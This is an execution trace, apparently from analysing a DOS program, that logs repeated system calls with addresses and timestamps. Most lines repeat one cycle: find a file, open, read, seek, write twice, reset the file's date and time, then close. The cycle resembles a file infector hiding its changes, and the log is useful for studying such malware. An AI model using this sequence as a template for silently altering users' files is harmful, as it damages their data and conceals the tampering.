2018-12-25T11:46:32.632565087Z 62 PC: 12ae2 | Close file
2018-12-25T11:46:32.641553027Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.645588133Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.654425176Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.662825414Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.6648244Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.668248507Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.670775282Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.674103709Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.675838011Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.684828889Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.68831159Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.696006231Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.705312751Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.707260535Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.711493217Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.714042296Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.717856565Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.719906405Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.730116449Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.735416796Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.742702538Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.751020954Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.75293987Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.756005182Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.75801752Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.76194416Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.763909032Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.891934832Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.896779359Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.905548412Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.913530225Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.916647516Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.920028376Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.9219618Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.925939497Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.927989931Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:33.0971828Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:33.10178847Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:33.110155815Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:33.118193209Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:33.120194399Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:33.429833407Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:33.431497365Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:33.439428466Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:33.441953229Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:33.45058767Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:33.453482345Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:33.461512813Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:33.469036219Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:33.470353473Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:33.473880608Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:33.475417993Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:33.478457625Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:33.4804353Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:33.489182973Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:33.492264439Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:33.500867761Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:33.504791763Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:33.506838784Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:33.510036418Z 26 PC: 12ac5 | Set disk transfer address